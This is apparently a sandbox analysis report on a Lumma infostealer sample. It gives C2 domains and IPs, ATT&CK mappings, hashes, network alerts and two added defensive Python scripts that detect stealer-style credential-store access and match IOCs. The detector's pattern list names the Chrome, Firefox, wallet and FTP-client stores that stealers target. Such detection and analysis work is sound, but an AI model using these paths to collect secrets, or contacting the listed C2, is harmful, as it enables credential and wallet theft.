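The file-open list above is the behavioural fingerprint of an infostealer: one non-browser process walks Chrome, Edge and Firefox credential stores, dozens of browser-extension storage directories, FTP client configs and desktop wallet folders within a single run. The following is an added example of detection logic over that pattern and is not part of the Joe Sandbox report. The path patterns are taken from the events listed above; the owner-process map (chrome.exe, msedge.exe, firefox.exe), the Sysmon-style event records and the alerting thresholds (two secret categories or five distinct sensitive paths from one process) are assumptions chosen for the example.

```python
import re
from collections import defaultdict

# Path patterns derived from the "File opened" events in the report, each paired
# with the category of secret it protects. Patterns are regexes over the
# lower-cased, backslash-normalised path.
SENSITIVE_PATHS = [
    (r"\\google\\chrome\\user data\\[^\\]+\\(login data|web data|history|network\\cookies)$", "browser"),
    (r"\\microsoft\\edge\\user data\\[^\\]+\\(login data|web data|history|network\\cookies)$", "browser"),
    (r"\\(local|sync) extension settings\\[a-p]{32}$", "browser-extension"),
    (r"\\mozilla\\firefox\\profiles\\[^\\]+\\(logins\.json|key4\.db|cert9\.db|cookies\.sqlite|places\.sqlite)$", "browser"),
    (r"\\(exodus\\exodus\.wallet|ledger live|atomic\\local storage\\leveldb|coinomi\\coinomi\\wallets"
     r"|bitcoin\\wallets|binance|com\.liberty\.jaxx\\indexeddb|electrum(-ltc)?\\wallets|guarda\\indexeddb)$", "wallet"),
    (r"\\(ftpbox|ftprush|ftpgetter|ftpinfo|smartftp\\client 2\.0\\favorites|sitedesigner\\3d-ftp)$", "ftp-client"),
]

# Assumed owner processes: a browser reading its own profile is benign.
OWNERS = {
    "\\google\\chrome\\": {"chrome.exe"},
    "\\microsoft\\edge\\": {"msedge.exe"},
    "\\mozilla\\firefox\\": {"firefox.exe"},
}


def normalise(path):
    return path.replace("/", "\\").lower()


def classify(path):
    """Return the secret category a path belongs to, or None if it is not sensitive."""
    p = normalise(path)
    for pattern, category in SENSITIVE_PATHS:
        if re.search(pattern, p):
            return category
    return None


def is_owner(image, path):
    """True when the accessing process is the application that owns the store."""
    p = normalise(path)
    for marker, owners in OWNERS.items():
        if marker in p:
            return image.lower() in owners
    return False


def detect_stealer_activity(events, min_categories=2, min_paths=5):
    """Group sensitive file opens per process and flag processes that sweep
    several secret categories or many distinct stores. `events` is an
    iterable of dicts with keys pid, image and path (Sysmon-like, constructed)."""
    per_proc = defaultdict(lambda: {"paths": set(), "categories": set()})
    for ev in events:
        category = classify(ev["path"])
        if category is None or is_owner(ev["image"], ev["path"]):
            continue
        key = (ev["pid"], ev["image"])
        per_proc[key]["paths"].add(normalise(ev["path"]))
        per_proc[key]["categories"].add(category)
    hits = []
    for (pid, image), info in per_proc.items():
        if len(info["categories"]) >= min_categories or len(info["paths"]) >= min_paths:
            hits.append({"pid": pid, "image": image,
                         "categories": sorted(info["categories"]),
                         "path_count": len(info["paths"])})
    return hits


# Constructed sample events: the first six mirror opens from the report (PID 7472
# is the sample's PID in the report); the last two are benign control cases.
SAMPLE_EVENTS = [
    {"pid": 7472, "image": "file.exe", "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 7472, "image": "file.exe", "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"pid": 7472, "image": "file.exe", "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn"},
    {"pid": 7472, "image": "file.exe", "path": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json"},
    {"pid": 7472, "image": "file.exe", "path": r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"},
    {"pid": 7472, "image": "file.exe", "path": r"C:\Users\user\AppData\Roaming\FTPRush"},
    {"pid": 4120, "image": "chrome.exe", "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 1844, "image": "explorer.exe", "path": r"C:\Users\user\Documents\report.docx"},
]

if __name__ == "__main__":
    for hit in detect_stealer_activity(SAMPLE_EVENTS):
        print(hit)
```

The ownership check is what keeps this rule quiet on a normal workstation: browsers read their own Login Data constantly, but nothing legitimate reads Chrome's stores, Firefox's key4.db and an Exodus wallet from one process. Tune the thresholds against your own telemetry; backup agents and password-manager importers are the usual sources of false positives and are better handled by an allow-list on the image path than by raising the thresholds.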

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix (the number in parentheses is the count of matched signatures for that technique; cells without a number were not matched)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Windows Management Instrumentation (2); Command and Scripting Interpreter (2); At; Cron; Launchd
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: Virtualization/Sandbox Evasion (34); Process Injection (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (34); Process Discovery (2); File and Directory Discovery (1); System Information Discovery (223)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Antivirus, Machine Learning and Genetic Malware Detection

Initial sample
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |

No Antivirus matches
No Antivirus matches
No Antivirus matches
URLs
Source | Detection | Scanner | Label
https://property-imper.sbs/apiD | 0% | Avira URL Cloud | safe
https://property-imper.sbs/apib | 0% | Avira URL Cloud | safe
https://property-imper.sbs/apif | 0% | Avira URL Cloud | safe
https://property-imper.sbs:443/apil | 0% | Avira URL Cloud | safe

Note that the trailing character after /api in these four entries (D, b, f, l) is a memory-string extraction artifact: the endpoint the sample actually contacts is https://property-imper.sbs/api (see the URLs contacted below). The "safe" verdict from the URL scanner is for the artifact string and says nothing about the C2 endpoint itself.
Domains contacted
Name | IP | Active | Malicious | Antivirus Detection | Reputation
property-imper.sbs | 172.67.162.84 | true | false | | high

URLs contacted
Name | Malicious | Antivirus Detection | Reputation
https://property-imper.sbs/api | false | | high
URLs found in memory or binary data
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://property-imper.sbs/apib | file.exe, 00000000.00000003.1418734369.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1418665847.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://property-imper.sbs/apif | file.exe, 00000000.00000003.1497765661.0000000001575000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1499176538.0000000001576000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441241710.0000000001573000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458128435.0000000001573000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497573349.0000000001573000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://property-imper.sbs:443/api | file.exe, 00000000.00000002.1498844199.00000000014E2000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://property-imper.sbs:443/apil | file.exe, 00000000.00000002.1498844199.00000000014E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252. | file.exe, 00000000.00000003.1397093240.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://property-imper.sbs/ | file.exe, 00000000.00000003.1441202945.0000000005CEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1418734369.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497536096.0000000005CEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497593408.0000000001559000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1502091584.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1499118729.0000000001559000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497785054.0000000001559000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1498844199.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497801753.0000000005CF5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441310758.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1418665847.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458069088.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | file.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://property-imper.sbs/apiD | file.exe, 00000000.00000003.1497765661.0000000001575000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1499176538.0000000001576000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458128435.0000000001573000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497573349.0000000001573000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://x1.c.lencr.org/0 | file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e | file.exe, 00000000.00000003.1397093240.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg | file.exe, 00000000.00000003.1397093240.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefoxgro.all | file.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.162.84 | property-imper.sbs | United States | 13335 | CLOUDFLARENET US | false
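The network indicators in this report need to be consumed with their hosting in mind: property-imper.sbs resolves to a Cloudflare edge (AS13335), and the context tables further down show the same domain also resolving to 104.21.33.116. An IP-only block or alert on a shared CDN address will both miss the C2 once it moves and hit unrelated Cloudflare-fronted sites. The following is an added example of IOC matching that grades confidence accordingly; it is not part of the Joe Sandbox report. The domain, the /api endpoint and the two IPs come from the report; the log line format, the source hosts and the two /13 prefixes used to represent the shared CDN edge are assumptions for the example.

```python
import ipaddress
import re

# Indicators from the report.
C2_DOMAINS = {"property-imper.sbs"}
C2_URL_PATHS = {"/api"}
C2_IPS = {"172.67.162.84", "104.21.33.116"}

# Assumed: prefixes standing in for the shared CDN edge (AS13335) that both C2
# IPs sit in. A hit on an address inside these nets, without a domain or SNI
# match, is weak evidence on its own.
SHARED_EDGE_NETS = [ipaddress.ip_network("172.64.0.0/13"), ipaddress.ip_network("104.16.0.0/13")]

KV = re.compile(r"(\w+)=(\S+)")


def parse(line):
    """Parse a constructed 'kind key=value ...' log line into a dict."""
    kind, _, rest = line.partition(" ")
    fields = dict(KV.findall(rest))
    fields["kind"] = kind
    return fields


def on_shared_edge(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SHARED_EDGE_NETS)


def match_ioc(line):
    """Return (confidence, reason) for a line that touches an indicator, else None.
    Domain / SNI / Host matches are high confidence; IP-only matches on the shared
    edge are low, because the address is not exclusive to the C2."""
    f = parse(line)
    host = f.get("query") or f.get("sni") or f.get("host")
    ip = f.get("answer") or f.get("dst", "").rsplit(":", 1)[0] or None
    if host and host.lower().rstrip(".") in C2_DOMAINS:
        if f.get("path") in C2_URL_PATHS:
            return "high", f"C2 domain with known endpoint {f['path']}"
        return "high", "C2 domain"
    if ip and ip in C2_IPS:
        if on_shared_edge(ip):
            return "low", "C2 IP on shared CDN edge, no domain/SNI match"
        return "medium", "C2 IP"
    return None


def scan(lines):
    """Run match_ioc over every line and collect hits with their line numbers."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = match_ioc(line)
        if result:
            hits.append({"line": n, "confidence": result[0], "reason": result[1],
                         "src": parse(line).get("src")})
    return hits


# Constructed sample log: DNS, TLS and proxy records from hypothetical hosts.
SAMPLE_LOG = [
    "dns query=property-imper.sbs answer=172.67.162.84 src=10.0.0.5",
    "tls sni=property-imper.sbs dst=172.67.162.84:443 src=10.0.0.5",
    "proxy host=property-imper.sbs path=/api method=POST src=10.0.0.5",
    "tls sni=cdn.example.net dst=104.21.33.116:443 src=10.0.0.9",
    "dns query=www.ecosia.org answer=203.0.113.10 src=10.0.0.7",
    "tls sni=example.org dst=198.51.100.4:443 src=10.0.0.7",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

In practice the domain (DNS query, TLS SNI, proxy Host header) is the indicator worth blocking and alerting on; the IP belongs in a watch-list that only escalates when it co-occurs with a domain match or with the host-side stealer behaviour documented earlier in this report.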
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561861
Start date and time: 2024-11-24 14:55:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: file.exe
Time | Type | Description
08:56:18 | API Interceptor | 8x Sleep call for process: file.exe modified
IP context
Match | Associated Sample Name / URL | Detection | Threat Name
172.67.162.84 | file.exe | malicious | LummaC Stealer
172.67.162.84 | file.exe | malicious | Unknown
172.67.162.84 | file.exe | malicious | LummaC Stealer
172.67.162.84 | file.exe | malicious | LummaC Stealer
172.67.162.84 | file.exe | malicious | LummaC Stealer
172.67.162.84 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
172.67.162.84 | file.exe | malicious | LummaC Stealer
172.67.162.84 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar
172.67.162.84 | file.exe | malicious | LummaC Stealer
172.67.162.84 | file.exe | malicious | LummaC Stealer
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              property-imper.sbsfile.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              • 172.67.162.84
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.33.116
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.161.207
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.21.10.6
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              • 104.21.33.116
                                                                              lw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.66.0.227
                                                                              mDHwap5GlV.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.74.152
                                                                              2aiDfP0r7h.lnkGet hashmaliciousUnknownBrowse
                                                                              • 104.16.230.132
                                                                              OVtsE8ZkBE.lnkGet hashmaliciousUnknownBrowse
                                                                              • 104.16.231.132
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                              • 172.67.162.84
                                                                              lw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.67.162.84
                                                                              mDHwap5GlV.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.67.162.84
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 172.67.162.84
                                                                              No context
                                                                              No created / dropped files found
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.951363705834021
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:file.exe
                                                                              File size:1'865'728 bytes
                                                                              MD5:5e1ee83df7fd0f85791575eed5abffa8
                                                                              SHA1:f08345571a764d0c1837951c26b75757f3328005
                                                                              SHA256:15b5aa1fbb4d831060a3276e5ea6119ddc6a5228371dd99bd40c98d9e4937ad2
                                                                              SHA512:0c109ecbc120f9ba8b9c8a50e9b27e5d1f3cb1af42025dd40c87a95a011550b15b900fee1473f3d719a858552ee5e97650ddc27daa8defbfa8147a0588ae61ed
                                                                              SSDEEP:24576:CSDl7QJZPHb1oBUH4qkL7r9TZQlIhm+AcktOYp9ND1c2QE3GNZs2vPPyc7WYKNKt:VFQJJbeBENelTccktNe7KMZPaca4
                                                                              TLSH:1D8533782691CF9FD28D8C7E2593C12773387DC6A6AF8EEA4D16B035C557072A16E0C8
                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g.............................0J...........@..........................`J.....v.....@.................................\...p..
                                                                              Icon Hash:00928e8e8686b000
                                                                              Entrypoint:0x8a3000
                                                                              Entrypoint Section:.taggant
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:6
                                                                              OS Version Minor:0
                                                                              File Version Major:6
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:6
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                              Instruction
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5805c | 0x70 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x57000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x581f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x56000 | 0x26200 | 3b103a061aba53ed65f898a81e476e9b | False | 0.999250768442623 | data | 7.97990031272369 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x57000 | 0x2b0 | 0x200 | a4de664039b501e30242a78111d7c34e | False | 0.798828125 | data | 6.002226034832892 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x58000 | 0x1000 | 0x200 | c92ced077364b300efd06b14c70a61dc | False | 0.15625 | data | 1.1194718105633323 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x59000 | 0x2ab000 | 0x200 | 53a1177555eb8bfd957f620219d06950 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mbsuitke | 0x304000 | 0x19e000 | 0x19da00 | ff9226eade0f4da9593c352393e01f7a | False | 0.9943489819431852 | data | 7.954841662083077 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
iyarxzjx | 0x4a2000 | 0x1000 | 0x400 | bb34997f5dab771e9bc02d78ece68706 | False | 0.78515625 | data | 6.087763009818877 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4a3000 | 0x3000 | 0x2200 | 09f278ec934636db7915e4dda8cb13fd | False | 0.05824908088235294 | DOS executable (COM) | 0.7634146160213555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x4a170c | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-24T14:56:18.868806+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49701 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:19.547647+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49701 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:19.547647+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49701 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:20.867552+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49702 | 172.67.162.84 | 443 | TCP
